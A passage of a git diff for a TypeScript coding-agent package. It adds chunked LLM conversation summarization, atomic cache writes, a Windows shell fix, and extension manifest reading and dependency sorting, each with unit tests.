Model; +} + +function makeFakeResponse(text: string): AssistantMessage { + return { + content: [{ type: "text", text }], + stopReason: "end_turn", + } as unknown as AssistantMessage; +} + +// --------------------------------------------------------------------------- +// chunkMessages tests +// --------------------------------------------------------------------------- + +describe("chunkMessages", () => { + it("returns a single chunk when messages fit in budget", () => { + const messages: AgentMessage[] = [ + makeUserMessage(1_000), + makeUserMessage(1_000), + ]; + const chunks = chunkMessages(messages, 100_000); + assert.equal(chunks.length, 1); + assert.equal(chunks[0].length, 2); + }); + + it("splits messages into multiple chunks when they exceed budget", () => { + const messages: AgentMessage[] = [ + makeUserMessage(50_000), + 
makeUserMessage(50_000), + makeUserMessage(50_000), + ]; + // Budget of 80k tokens means each 50k message gets its own chunk + // (or two fit together if budget allows) + const chunks = chunkMessages(messages, 80_000); + assert.ok(chunks.length > 1, `Expected multiple chunks, got ${chunks.length}`); + // All messages should be present across chunks + const totalMessages = chunks.reduce((sum, c) => sum + c.length, 0); + assert.equal(totalMessages, 3); + }); + + it("puts a single oversized message in its own chunk", () => { + const messages: AgentMessage[] = [ + makeUserMessage(200_000), // Way over any reasonable budget + ]; + const chunks = chunkMessages(messages, 80_000); + assert.equal(chunks.length, 1); + assert.equal(chunks[0].length, 1); + }); + + it("preserves message order across chunks", () => { + // Create messages with identifiable sizes + const messages: AgentMessage[] = [ + makeUserMessage(30_000), // ~30k tokens + makeUserMessage(30_000), + makeUserMessage(30_000), + makeUserMessage(30_000), + ]; + const chunks = chunkMessages(messages, 50_000); + // Reconstruct original order + const flat = chunks.flat(); + assert.equal(flat.length, 4); + for (let i = 0; i < flat.length; i++) { + assert.strictEqual(flat[i], messages[i], `Message ${i} should be in order`); + } + }); +}); + +// --------------------------------------------------------------------------- +// generateSummary chunked fallback tests +// --------------------------------------------------------------------------- + +describe("generateSummary — chunked fallback (#2932)", () => { + it("calls _completeFn multiple times when messages exceed model context window", async () => { + // Arrange: 3 messages of ~80k tokens each = ~240k total, model has 200k window + const messages: AgentMessage[] = [ + makeUserMessage(80_000), + makeUserMessage(80_000), + makeUserMessage(80_000), + ]; + const model = makeModel(200_000); + const reserveTokens = 16_384; + + // Verify our test setup: messages really do 
exceed the model window + let totalTokens = 0; + for (const m of messages) totalTokens += estimateTokens(m); + assert.ok( + totalTokens > model.contextWindow, + `Test setup: ${totalTokens} tokens should exceed ${model.contextWindow} context window`, + ); + + // Track calls + const calls: string[] = []; + const mockComplete = mock.fn(async (_model: any, context: any, _options: any) => { + const userMsg = context.messages?.[0]; + const text = + typeof userMsg?.content === "string" + ? userMsg.content + : userMsg?.content?.[0]?.text ?? ""; + + if (text.includes("")) { + calls.push("update"); + } else { + calls.push("initial"); + } + return makeFakeResponse("Summary of chunk"); + }); + + const summary = await generateSummary( + messages, + model, + reserveTokens, + undefined, // apiKey + undefined, // signal + undefined, // customInstructions + undefined, // previousSummary + mockComplete, // _completeFn override for testing + ); + + // Assert: should have called completeSimple more than once (chunked) + assert.ok( + mockComplete.mock.callCount() > 1, + `Expected multiple calls for chunked summarization, got ${mockComplete.mock.callCount()}`, + ); + + // First call should be an initial summary, subsequent should be updates + assert.equal(calls[0], "initial", "First chunk should use initial summarization prompt"); + for (let i = 1; i < calls.length; i++) { + assert.equal(calls[i], "update", `Chunk ${i + 1} should use update summarization prompt`); + } + + // Should return a non-empty summary + assert.ok(summary.length > 0, "Summary should not be empty"); + }); + + it("uses single-pass when messages fit within model context window", async () => { + const messages: AgentMessage[] = [ + makeUserMessage(10_000), + makeUserMessage(10_000), + ]; + const model = makeModel(200_000); + const reserveTokens = 16_384; + + // Verify test setup + let totalTokens = 0; + for (const m of messages) totalTokens += estimateTokens(m); + assert.ok( + totalTokens < model.contextWindow, + 
`Test setup: ${totalTokens} tokens should fit in ${model.contextWindow} context window`, + ); + + const mockComplete = mock.fn(async () => makeFakeResponse("Single pass summary")); + + await generateSummary(messages, model, reserveTokens, undefined, undefined, undefined, undefined, mockComplete); + + assert.equal( + mockComplete.mock.callCount(), + 1, + "Should use single-pass summarization when messages fit in context window", + ); + }); + + it("passes previousSummary through chunked summarization", async () => { + const messages: AgentMessage[] = [ + makeUserMessage(80_000), + makeUserMessage(80_000), + makeUserMessage(80_000), + ]; + const model = makeModel(200_000); + const reserveTokens = 16_384; + const previousSummary = "Previous session summary content"; + + const prompts: string[] = []; + const mockComplete = mock.fn(async (_model: any, context: any) => { + const userMsg = context.messages?.[0]; + const text = + typeof userMsg?.content === "string" + ? userMsg.content + : userMsg?.content?.[0]?.text ?? ""; + prompts.push(text); + return makeFakeResponse("Chunk summary"); + }); + + await generateSummary( + messages, + model, + reserveTokens, + undefined, + undefined, + undefined, + previousSummary, + mockComplete, + ); + + // First chunk should include the previousSummary + assert.ok( + prompts[0].includes(previousSummary), + "First chunk should incorporate the previousSummary", + ); + }); +}); diff --git a/packages/pi-coding-agent/src/core/compaction/compaction.ts b/packages/pi-coding-agent/src/core/compaction/compaction.ts index 13e00a6d1..cd3183277 100644 --- a/packages/pi-coding-agent/src/core/compaction/compaction.ts +++ b/packages/pi-coding-agent/src/core/compaction/compaction.ts @@ -489,18 +489,111 @@ Use this EXACT format: Keep each section concise. Preserve exact file paths, function names, and error messages.`; +/** + * Split messages into chunks where each chunk's estimated token count + * stays within `maxTokensPerChunk`. 
A single message that exceeds the
+ * budget is placed alone in its own chunk (never dropped).
+ */
+export function chunkMessages(messages: AgentMessage[], maxTokensPerChunk: number): AgentMessage[][] {
+ const chunks: AgentMessage[][] = [];
+ let currentChunk: AgentMessage[] = [];
+ let currentTokens = 0;
+
+ for (const msg of messages) {
+ const msgTokens = estimateTokens(msg);
+
+ if (currentChunk.length > 0 && currentTokens + msgTokens > maxTokensPerChunk) {
+ // Current chunk is full — start a new one
+ chunks.push(currentChunk);
+ currentChunk = [msg];
+ currentTokens = msgTokens;
+ } else {
+ currentChunk.push(msg);
+ currentTokens += msgTokens;
+ }
+ }
+
+ if (currentChunk.length > 0) {
+ chunks.push(currentChunk);
+ }
+
+ return chunks;
+}
+
+/** Type for the completion function, allowing injection for tests. */
+type CompleteFn = typeof completeSimple;
+
 /**
  * Generate a summary of the conversation using the LLM.
  * If previousSummary is provided, uses the update prompt to merge.
+ *
+ * When the messages exceed the model's context window, automatically
+ * falls back to chunked summarization: summarize the first chunk,
+ * then iteratively merge subsequent chunks using the update prompt.
+ *
+ * @param _completeFn - Internal override for testing; defaults to completeSimple.
  */
 export async function generateSummary(
 currentMessages: AgentMessage[],
 model: Model,
 reserveTokens: number,
- apiKey: string,
+ apiKey: string | undefined,
 signal?: AbortSignal,
 customInstructions?: string,
 previousSummary?: string,
+ _completeFn?: CompleteFn,
+): Promise<string> {
+ const complete = _completeFn ??
completeSimple;
+
+ // Estimate total tokens for the messages to summarize
+ let totalTokens = 0;
+ for (const msg of currentMessages) {
+ totalTokens += estimateTokens(msg);
+ }
+
+ // Overhead for the prompt framing, system prompt, and response budget
+ const promptOverhead = 4_000;
+ const maxTokens = Math.floor(0.8 * reserveTokens); // NOTE(review): unused here — singlePassSummary computes its own budget
+ const maxInputTokens = (model.contextWindow || 200_000) - reserveTokens - promptOverhead;
+
+ // If messages fit in the context window, use single-pass summarization
+ if (totalTokens <= maxInputTokens) {
+ return singlePassSummary(currentMessages, model, reserveTokens, apiKey, signal, customInstructions, previousSummary, complete);
+ }
+
+ // Chunked fallback: split messages and iteratively summarize
+ const chunks = chunkMessages(currentMessages, maxInputTokens);
+ let runningSummary = previousSummary;
+
+ for (let i = 0; i < chunks.length; i++) {
+ runningSummary = await singlePassSummary(
+ chunks[i],
+ model,
+ reserveTokens,
+ apiKey,
+ signal,
+ customInstructions,
+ runningSummary,
+ complete,
+ );
+ }
+
+ return runningSummary!;
+}
+
+/**
+ * Single-pass summarization of messages using the LLM.
+ * If previousSummary is provided, uses the update prompt to merge.
+ */
+async function singlePassSummary(
+ currentMessages: AgentMessage[],
+ model: Model,
+ reserveTokens: number,
+ apiKey: string | undefined,
+ signal?: AbortSignal,
+ customInstructions?: string,
+ previousSummary?: string,
+ complete: CompleteFn = completeSimple,
 ): Promise<string> {
 const maxTokens = Math.floor(0.8 * reserveTokens);
@@ -526,7 +619,7 @@ export async function generateSummary(
 ? { maxTokens, signal, apiKey, reasoning: "high" as const }
 : { maxTokens, signal, apiKey };
- const response = await completeSimple(
+ const response = await complete(
 model,
 { systemPrompt: SUMMARIZATION_SYSTEM_PROMPT, messages: createSummarizationMessage(promptText) },
 completionOptions,
@@ -660,7 +753,7 @@ Be concise.
Focus on what's needed to understand the kept suffix.`; export async function compact( preparation: CompactionPreparation, model: Model, - apiKey: string, + apiKey: string | undefined, customInstructions?: string, signal?: AbortSignal, ): Promise { @@ -732,7 +825,7 @@ async function generateTurnPrefixSummary( messages: AgentMessage[], model: Model, reserveTokens: number, - apiKey: string, + apiKey: string | undefined, signal?: AbortSignal, ): Promise { const maxTokens = Math.floor(0.5 * reserveTokens); // Smaller budget for turn prefix diff --git a/packages/pi-coding-agent/src/core/discovery-cache.ts b/packages/pi-coding-agent/src/core/discovery-cache.ts index a75633c2f..d9d9bded8 100644 --- a/packages/pi-coding-agent/src/core/discovery-cache.ts +++ b/packages/pi-coding-agent/src/core/discovery-cache.ts @@ -3,7 +3,7 @@ * Stores results at {agentDir}/discovery-cache.json with per-provider TTLs. */ -import { existsSync, mkdirSync, readFileSync, writeFileSync } from "fs"; +import { existsSync, mkdirSync, readFileSync, renameSync, writeFileSync } from "fs"; import { dirname, join } from "path"; import { getAgentDir } from "../config.js"; import { type DiscoveredModel, getDefaultTTL } from "./model-discovery.js"; @@ -35,6 +35,8 @@ export class ModelDiscoveryCache { } set(provider: string, models: DiscoveredModel[], ttlMs?: number): void { + // Re-read from disk to get the latest state before modifying + this.load(); this.data.entries[provider] = { models, fetchedAt: Date.now(), @@ -50,6 +52,8 @@ export class ModelDiscoveryCache { } clear(provider?: string): void { + // Re-read from disk to get the latest state before modifying + this.load(); if (provider) { delete this.data.entries[provider]; } else { @@ -89,7 +93,10 @@ export class ModelDiscoveryCache { if (!existsSync(dir)) { mkdirSync(dir, { recursive: true }); } - writeFileSync(this.cachePath, JSON.stringify(this.data, null, 2), "utf-8"); + // Atomic write: write to temp file then rename to avoid partial reads + 
const tmpPath = this.cachePath + ".tmp"; + writeFileSync(tmpPath, JSON.stringify(this.data, null, 2), "utf-8"); + renameSync(tmpPath, this.cachePath); } catch { // Silently ignore write failures (read-only FS, permissions, etc.) } diff --git a/packages/pi-coding-agent/src/core/exec.ts b/packages/pi-coding-agent/src/core/exec.ts index b7dd046c4..9d12e8c23 100644 --- a/packages/pi-coding-agent/src/core/exec.ts +++ b/packages/pi-coding-agent/src/core/exec.ts @@ -39,7 +39,9 @@ export async function execCommand( return new Promise((resolve) => { const proc = spawn(command, args, { cwd, - shell: false, + // On Windows, npm/npx/tsc etc. are .cmd scripts that require shell + // resolution. Without this, spawn fails with ENOENT or EINVAL (#2854). + shell: process.platform === "win32", stdio: ["ignore", "pipe", "pipe"], }); diff --git a/packages/pi-coding-agent/src/core/extensions/extension-manifest.test.ts b/packages/pi-coding-agent/src/core/extensions/extension-manifest.test.ts new file mode 100644 index 000000000..3796ab071 --- /dev/null +++ b/packages/pi-coding-agent/src/core/extensions/extension-manifest.test.ts @@ -0,0 +1,77 @@ +// GSD-2 — Extension Manifest Tests +// Copyright (c) 2026 Jeremy McSpadden + +import { describe, it } from "node:test"; +import assert from "node:assert/strict"; +import { mkdtempSync, mkdirSync, writeFileSync } from "node:fs"; +import { join } from "node:path"; +import { tmpdir } from "node:os"; +import { readManifest, readManifestFromEntryPath } from "./extension-manifest.js"; + +describe("readManifest", () => { + it("returns null for missing directory", () => { + assert.equal(readManifest("/nonexistent/path"), null); + }); + + it("returns null for directory without manifest", () => { + const dir = mkdtempSync(join(tmpdir(), "ext-manifest-")); + assert.equal(readManifest(dir), null); + }); + + it("returns null for invalid JSON", () => { + const dir = mkdtempSync(join(tmpdir(), "ext-manifest-")); + writeFileSync(join(dir, 
"extension-manifest.json"), "not json{{{", "utf-8"); + assert.equal(readManifest(dir), null); + }); + + it("returns null for manifest missing required fields", () => { + const dir = mkdtempSync(join(tmpdir(), "ext-manifest-")); + writeFileSync( + join(dir, "extension-manifest.json"), + JSON.stringify({ id: "test", name: "test" }), + ); + assert.equal(readManifest(dir), null); + }); + + it("returns valid manifest", () => { + const dir = mkdtempSync(join(tmpdir(), "ext-manifest-")); + const manifest = { + id: "test-ext", + name: "Test Extension", + version: "1.0.0", + tier: "bundled", + requires: { platform: ">=2.29.0" }, + }; + writeFileSync(join(dir, "extension-manifest.json"), JSON.stringify(manifest)); + const result = readManifest(dir); + assert.equal(result?.id, "test-ext"); + assert.equal(result?.tier, "bundled"); + }); +}); + +describe("readManifestFromEntryPath", () => { + it("reads manifest from parent of entry path", () => { + const dir = mkdtempSync(join(tmpdir(), "ext-manifest-")); + const extDir = join(dir, "my-ext"); + mkdirSync(extDir); + writeFileSync( + join(extDir, "extension-manifest.json"), + JSON.stringify({ + id: "my-ext", + name: "My Extension", + version: "1.0.0", + tier: "community", + }), + ); + writeFileSync(join(extDir, "index.ts"), ""); + + const result = readManifestFromEntryPath(join(extDir, "index.ts")); + assert.equal(result?.id, "my-ext"); + assert.equal(result?.tier, "community"); + }); + + it("returns null when entry path parent has no manifest", () => { + const dir = mkdtempSync(join(tmpdir(), "ext-manifest-")); + assert.equal(readManifestFromEntryPath(join(dir, "index.ts")), null); + }); +}); diff --git a/packages/pi-coding-agent/src/core/extensions/extension-manifest.ts b/packages/pi-coding-agent/src/core/extensions/extension-manifest.ts new file mode 100644 index 000000000..673f5a410 --- /dev/null +++ b/packages/pi-coding-agent/src/core/extensions/extension-manifest.ts @@ -0,0 +1,62 @@ +// GSD-2 — Extension Manifest: Types and 
reading for extension-manifest.json
+// Copyright (c) 2026 Jeremy McSpadden
+
+import { existsSync, readFileSync } from "node:fs";
+import { dirname, join } from "node:path";
+
+// ─── Types ──────────────────────────────────────────────────────────────────
+
+export interface ExtensionManifest {
+ id: string;
+ name: string;
+ version: string;
+ description: string;
+ tier: "core" | "bundled" | "community";
+ requires: { platform: string };
+ provides?: {
+ tools?: string[];
+ commands?: string[];
+ hooks?: string[];
+ shortcuts?: string[];
+ };
+ dependencies?: {
+ extensions?: string[];
+ runtime?: string[];
+ };
+}
+
+// ─── Validation ─────────────────────────────────────────────────────────────
+
+function isManifest(data: unknown): data is ExtensionManifest {
+ if (typeof data !== "object" || data === null) return false;
+ const obj = data as Record<string, unknown>;
+ return (
+ typeof obj.id === "string" &&
+ typeof obj.name === "string" &&
+ typeof obj.version === "string" &&
+ typeof obj.tier === "string"
+ );
+}
+
+// ─── Reading ────────────────────────────────────────────────────────────────
+
+/** Read extension-manifest.json from a directory. Returns null if missing or invalid. */
+export function readManifest(extensionDir: string): ExtensionManifest | null {
+ const manifestPath = join(extensionDir, "extension-manifest.json");
+ if (!existsSync(manifestPath)) return null;
+ try {
+ const raw = JSON.parse(readFileSync(manifestPath, "utf-8"));
+ return isManifest(raw) ? raw : null;
+ } catch {
+ return null;
+ }
+}
+
+/**
+ * Given an entry path (e.g. `.../extensions/browser-tools/index.ts`),
+ * resolve the parent directory and read its manifest.
+ */ +export function readManifestFromEntryPath(entryPath: string): ExtensionManifest | null { + const dir = dirname(entryPath); + return readManifest(dir); +} diff --git a/packages/pi-coding-agent/src/core/extensions/extension-sort.test.ts b/packages/pi-coding-agent/src/core/extensions/extension-sort.test.ts new file mode 100644 index 000000000..30a4b667e --- /dev/null +++ b/packages/pi-coding-agent/src/core/extensions/extension-sort.test.ts @@ -0,0 +1,134 @@ +// GSD-2 — Extension Sort Tests +// Copyright (c) 2026 Jeremy McSpadden + +import { describe, it } from "node:test"; +import assert from "node:assert/strict"; +import { mkdtempSync, mkdirSync, writeFileSync } from "node:fs"; +import { join } from "node:path"; +import { tmpdir } from "node:os"; +import { sortExtensionPaths } from "./extension-sort.js"; + +function createExtDir(base: string, id: string, deps?: string[]): string { + const dir = join(base, id); + mkdirSync(dir, { recursive: true }); + writeFileSync( + join(dir, "extension-manifest.json"), + JSON.stringify({ + id, + name: id, + version: "1.0.0", + tier: "bundled", + requires: { platform: ">=2.29.0" }, + ...(deps ? 
{ dependencies: { extensions: deps } } : {}), + }), + ); + writeFileSync(join(dir, "index.ts"), `export default function() {}`); + return join(dir, "index.ts"); +} + +describe("sortExtensionPaths", () => { + it("returns empty for empty input", () => { + const result = sortExtensionPaths([]); + assert.deepEqual(result.sortedPaths, []); + assert.deepEqual(result.warnings, []); + }); + + it("sorts independent extensions alphabetically", () => { + const base = mkdtempSync(join(tmpdir(), "ext-sort-")); + const pathC = createExtDir(base, "charlie"); + const pathA = createExtDir(base, "alpha"); + const pathB = createExtDir(base, "bravo"); + + const result = sortExtensionPaths([pathC, pathA, pathB]); + assert.deepEqual(result.sortedPaths, [pathA, pathB, pathC]); + assert.equal(result.warnings.length, 0); + }); + + it("sorts dependencies before dependents", () => { + const base = mkdtempSync(join(tmpdir(), "ext-sort-")); + const pathBase = createExtDir(base, "base-ext"); + const pathDependent = createExtDir(base, "dependent-ext", ["base-ext"]); + + // Pass dependent first — sort should reorder + const result = sortExtensionPaths([pathDependent, pathBase]); + assert.deepEqual(result.sortedPaths, [pathBase, pathDependent]); + assert.equal(result.warnings.length, 0); + }); + + it("handles deep dependency chains", () => { + const base = mkdtempSync(join(tmpdir(), "ext-sort-")); + const pathA = createExtDir(base, "a"); + const pathB = createExtDir(base, "b", ["a"]); + const pathC = createExtDir(base, "c", ["b"]); + + const result = sortExtensionPaths([pathC, pathB, pathA]); + assert.deepEqual(result.sortedPaths, [pathA, pathB, pathC]); + assert.equal(result.warnings.length, 0); + }); + + it("warns about missing dependencies but still loads", () => { + const base = mkdtempSync(join(tmpdir(), "ext-sort-")); + const pathExt = createExtDir(base, "my-ext", ["nonexistent"]); + + const result = sortExtensionPaths([pathExt]); + assert.equal(result.sortedPaths.length, 1); + 
assert.equal(result.sortedPaths[0], pathExt); + assert.equal(result.warnings.length, 1); + assert.match(result.warnings[0].message, /nonexistent.*not installed/); + }); + + it("warns about cycles but still loads both", () => { + const base = mkdtempSync(join(tmpdir(), "ext-sort-")); + const pathA = createExtDir(base, "cycle-a", ["cycle-b"]); + const pathB = createExtDir(base, "cycle-b", ["cycle-a"]); + + const result = sortExtensionPaths([pathA, pathB]); + assert.equal(result.sortedPaths.length, 2); + assert.ok(result.warnings.length > 0); + assert.ok(result.warnings.some((w) => w.message.includes("cycle"))); + }); + + it("silently ignores self-dependencies", () => { + const base = mkdtempSync(join(tmpdir(), "ext-sort-")); + const pathExt = createExtDir(base, "self-dep", ["self-dep"]); + + const result = sortExtensionPaths([pathExt]); + assert.deepEqual(result.sortedPaths, [pathExt]); + assert.equal(result.warnings.length, 0); + }); + + it("prepends extensions without manifests", () => { + const base = mkdtempSync(join(tmpdir(), "ext-sort-")); + const noManifestDir = join(base, "no-manifest"); + mkdirSync(noManifestDir, { recursive: true }); + writeFileSync(join(noManifestDir, "index.ts"), `export default function() {}`); + const noManifestPath = join(noManifestDir, "index.ts"); + + const pathWithManifest = createExtDir(base, "with-manifest"); + + const result = sortExtensionPaths([pathWithManifest, noManifestPath]); + assert.equal(result.sortedPaths[0], noManifestPath); + assert.equal(result.sortedPaths[1], pathWithManifest); + }); + + it("handles non-array dependencies gracefully", () => { + const base = mkdtempSync(join(tmpdir(), "ext-sort-")); + const dir = join(base, "bad-deps"); + mkdirSync(dir, { recursive: true }); + writeFileSync( + join(dir, "extension-manifest.json"), + JSON.stringify({ + id: "bad-deps", + name: "bad-deps", + version: "1.0.0", + tier: "bundled", + dependencies: { extensions: "not-an-array" }, + }), + ); + writeFileSync(join(dir, 
"index.ts"), `export default function() {}`); + + const result = sortExtensionPaths([join(dir, "index.ts")]); + assert.equal(result.sortedPaths.length, 1); + assert.equal(result.warnings.length, 0); + }); +}); diff --git a/packages/pi-coding-agent/src/core/extensions/extension-sort.ts b/packages/pi-coding-agent/src/core/extensions/extension-sort.ts new file mode 100644 index 000000000..07a3e67d6 --- /dev/null +++ b/packages/pi-coding-agent/src/core/extensions/extension-sort.ts @@ -0,0 +1,137 @@ +// GSD-2 — Extension Sort: Topological dependency ordering +// Copyright (c) 2026 Jeremy McSpadden + +import { readManifestFromEntryPath } from "./extension-manifest.js"; + +export interface SortWarning { + declaringId: string; + missingId: string; + message: string; +} + +export interface SortResult { + sortedPaths: string[]; + warnings: SortWarning[]; +} + +/** + * Sort extension entry paths in topological dependency-first order using Kahn's BFS algorithm. + * + * - Extensions without manifests are prepended in input order. + * - Missing dependencies produce a structured warning but do not block loading. + * - Cycles produce warnings; cycle participants are appended alphabetically. + * - Self-dependencies are silently ignored. 
+ */
+export function sortExtensionPaths(paths: string[]): SortResult {
+ const warnings: SortWarning[] = [];
+ const pathsWithoutId: string[] = [];
+ const idToPath = new Map<string, string>();
+
+ // Step 1: Build ID map
+ for (const p of paths) {
+ const manifest = readManifestFromEntryPath(p);
+ if (!manifest) {
+ pathsWithoutId.push(p);
+ } else {
+ idToPath.set(manifest.id, p);
+ }
+ }
+
+ // Step 2: Build graph — inDegree and dependents adjacency
+ const inDegree = new Map<string, number>();
+ const dependents = new Map<string, string[]>(); // dep → [ids that depend on dep]
+
+ for (const id of idToPath.keys()) {
+ if (!inDegree.has(id)) inDegree.set(id, 0);
+ if (!dependents.has(id)) dependents.set(id, []);
+ }
+
+ for (const [id, entryPath] of idToPath) {
+ const manifest = readManifestFromEntryPath(entryPath);
+ const rawDeps = manifest?.dependencies?.extensions ?? [];
+ const deps = Array.isArray(rawDeps) ? rawDeps : [];
+
+ for (const depId of deps) {
+ // Silently ignore self-deps
+ if (depId === id) continue;
+
+ if (!idToPath.has(depId)) {
+ // Missing dependency — warn and skip edge
+ warnings.push({
+ declaringId: id,
+ missingId: depId,
+ message: `Extension '${id}' declares dependency '${depId}' which is not installed — loading anyway`,
+ });
+ continue;
+ }
+
+ // Valid edge: id depends on depId → increment inDegree[id], add id to dependents[depId]
+ inDegree.set(id, (inDegree.get(id) ?? 0) + 1);
+ const depDependents = dependents.get(depId) ?? [];
+ depDependents.push(id);
+ dependents.set(depId, depDependents);
+ }
+ }
+
+ // Step 3: Kahn's algorithm — start with nodes that have inDegree 0
+ const sorted: string[] = [];
+ // Ready queue: IDs with inDegree 0, maintained in alphabetical order
+ const ready: string[] = [...idToPath.keys()]
+ .filter((id) => inDegree.get(id) === 0)
+ .sort();
+
+ while (ready.length > 0) {
+ const id = ready.shift()!;
+ sorted.push(idToPath.get(id)!);
+
+ const deps = dependents.get(id) ??
[]; + for (const depId of deps) { + const newDegree = (inDegree.get(depId) ?? 0) - 1; + inDegree.set(depId, newDegree); + if (newDegree === 0) { + // Insert into ready queue maintaining alphabetical order + const insertIdx = ready.findIndex((r) => r > depId); + if (insertIdx === -1) { + ready.push(depId); + } else { + ready.splice(insertIdx, 0, depId); + } + } + } + } + + // Step 4: Cycle handling — any remaining IDs with inDegree > 0 + const cycleIds = [...idToPath.keys()] + .filter((id) => (inDegree.get(id) ?? 0) > 0) + .sort(); + + if (cycleIds.length > 0) { + const cycleSet = new Set(cycleIds); + + for (const id of cycleIds) { + const entryPath = idToPath.get(id)!; + const manifest = readManifestFromEntryPath(entryPath); + const rawDeps = manifest?.dependencies?.extensions ?? []; + const deps = Array.isArray(rawDeps) ? rawDeps : []; + + for (const depId of deps) { + if (depId === id) continue; + if (!cycleSet.has(depId)) continue; + + // Both id and depId are in cycle — emit warning + warnings.push({ + declaringId: id, + missingId: depId, + message: `Extension '${id}' and '${depId}' form a dependency cycle — loading both anyway (alphabetical order)`, + }); + } + + sorted.push(entryPath); + } + } + + return { + sortedPaths: [...pathsWithoutId, ...sorted], + warnings, + }; +} diff --git a/packages/pi-coding-agent/src/core/extensions/index.ts b/packages/pi-coding-agent/src/core/extensions/index.ts index 0c86d2d72..70525095a 100644 --- a/packages/pi-coding-agent/src/core/extensions/index.ts +++ b/packages/pi-coding-agent/src/core/extensions/index.ts @@ -2,6 +2,10 @@ * Extension system for lifecycle events and custom tools. 
*/ +export type { ExtensionManifest } from "./extension-manifest.js"; +export { readManifest, readManifestFromEntryPath } from "./extension-manifest.js"; +export type { SortResult, SortWarning } from "./extension-sort.js"; +export { sortExtensionPaths } from "./extension-sort.js"; export type { SlashCommandInfo, SlashCommandLocation, SlashCommandSource } from "../slash-commands.js"; export { createExtensionRuntime, @@ -94,6 +98,11 @@ export type { // Provider Registration ProviderConfig, ProviderModelConfig, + LifecycleHookContext, + LifecycleHookHandler, + LifecycleHookMap, + LifecycleHookPhase, + LifecycleHookScope, ReadToolCallEvent, ReadToolResultEvent, // Commands @@ -141,6 +150,8 @@ export type { // Events - User Bash UserBashEvent, UserBashEventResult, + BashTransformEvent, + BashTransformEventResult, WidgetPlacement, WriteToolCallEvent, WriteToolResultEvent, diff --git a/packages/pi-coding-agent/src/core/extensions/loader.test.ts b/packages/pi-coding-agent/src/core/extensions/loader.test.ts index ef98c1189..da547e525 100644 --- a/packages/pi-coding-agent/src/core/extensions/loader.test.ts +++ b/packages/pi-coding-agent/src/core/extensions/loader.test.ts @@ -4,6 +4,7 @@ import * as fs from "node:fs"; import * as os from "node:os"; import * as path from "node:path"; import { isProjectTrusted, trustProject, getUntrustedExtensionPaths } from "./project-trust.js"; +import { containsTypeScriptSyntax, loadExtensions, resetExtensionLoaderCache } from "./loader.js"; // ─── helpers ────────────────────────────────────────────────────────────────── @@ -139,3 +140,136 @@ describe("getUntrustedExtensionPaths", () => { assert.deepEqual(result, paths); }); }); + +// ─── containsTypeScriptSyntax ───────────────────────────────────────────────── + +describe("containsTypeScriptSyntax", () => { + it("detects parameter type annotations", () => { + assert.ok(containsTypeScriptSyntax(`export default function activate(api: ExtensionAPI) {}`)); + }); + + it("detects interface 
declarations", () => {
+ assert.ok(containsTypeScriptSyntax(`interface Config { name: string; }`));
+ });
+
+ it("detects type alias declarations", () => {
+ assert.ok(containsTypeScriptSyntax(`type Handler = (event: string) => void;`));
+ });
+
+ it("detects enum declarations", () => {
+ assert.ok(containsTypeScriptSyntax(`enum Direction { Up, Down, Left, Right }`));
+ });
+
+ it("detects return type annotations", () => {
+ assert.ok(containsTypeScriptSyntax(`function foo(): Promise<void> {}`));
+ });
+
+ it("detects generic type parameters on functions", () => {
+ assert.ok(containsTypeScriptSyntax(`function identity<T>(arg: T): T { return arg; }`));
+ });
+
+ it("detects variable type annotations", () => {
+ assert.ok(containsTypeScriptSyntax(`const name: string = "hello";`));
+ });
+
+ it("returns false for plain JavaScript", () => {
+ assert.equal(containsTypeScriptSyntax(`export default function activate(api) { api.on("init", () => {}); }`), false);
+ });
+
+ it("returns false for empty string", () => {
+ assert.equal(containsTypeScriptSyntax(""), false);
+ });
+
+ it("returns false for JSDoc comments with type-like syntax", () => {
+ // JSDoc uses different syntax: @param {string} name
+ assert.equal(containsTypeScriptSyntax(`/** @param {string} name */\nexport default function activate(api) {}`), false);
+ });
+});
+
+// ─── loadExtensions: TypeScript syntax in .js files ───────────────────────────
+
+describe("loadExtensions", () => {
+ let tmpDir: string;
+
+ beforeEach(() => {
+ tmpDir = makeTempDir();
+ });
+
+ afterEach(() => {
+ cleanDir(tmpDir);
+ });
+
+ it("reports helpful error when .js file contains TypeScript syntax", async () => {
+ // Create a .js file that uses TypeScript type annotations
+ const extPath = path.join(tmpDir, "my-extension.js");
+ fs.writeFileSync(
+ extPath,
+ `export default function activate(api: ExtensionAPI) {\n api.on("init", async () => {});\n}\n`,
+ );
+
+ const result = await loadExtensions([extPath], tmpDir);
+
+
assert.equal(result.errors.length, 1); + const errorMsg = result.errors[0].error; + // The error should mention TypeScript syntax and suggest .ts extension + assert.ok( + /TypeScript/.test(errorMsg) && /\.ts\b/.test(errorMsg), + `Expected error to mention TypeScript syntax and .ts extension, got: ${errorMsg}`, + ); + }); + + it("reports helpful error when .js file contains TS interface declaration", async () => { + const extPath = path.join(tmpDir, "typed-ext.js"); + fs.writeFileSync( + extPath, + `interface Config { name: string; }\nexport default function activate(api) { return; }\n`, + ); + + const result = await loadExtensions([extPath], tmpDir); + + assert.equal(result.errors.length, 1); + const errorMsg = result.errors[0].error; + assert.ok( + /TypeScript/.test(errorMsg) && /\.ts\b/.test(errorMsg), + `Expected error to mention TypeScript syntax and .ts extension, got: ${errorMsg}`, + ); + }); +}); + +// ─── resetExtensionLoaderCache ─────────────────────────────────────────────── + +describe("resetExtensionLoaderCache", () => { + let tmpDir: string; + + beforeEach(() => { + tmpDir = makeTempDir(); + // Always start with a clean cache so tests are independent + resetExtensionLoaderCache(); + }); + + afterEach(() => { + resetExtensionLoaderCache(); + cleanDir(tmpDir); + }); + + it("clears the jiti singleton so a fresh instance is created on next load", async () => { + // Write a minimal valid extension that returns a name + const extPath = path.join(tmpDir, "cache-ext.ts"); + fs.writeFileSync( + extPath, + `export default function activate(api: any) { return { name: "cache-ext" }; }\n`, + ); + + // First load — creates the jiti singleton and caches the module + const result1 = await loadExtensions([extPath], tmpDir); + assert.equal(result1.extensions.length, 1, "first load should succeed"); + + // Reset the cache — nulls the singleton + resetExtensionLoaderCache(); + + // Second load — should create a new jiti instance (not reuse the old one) + // and still 
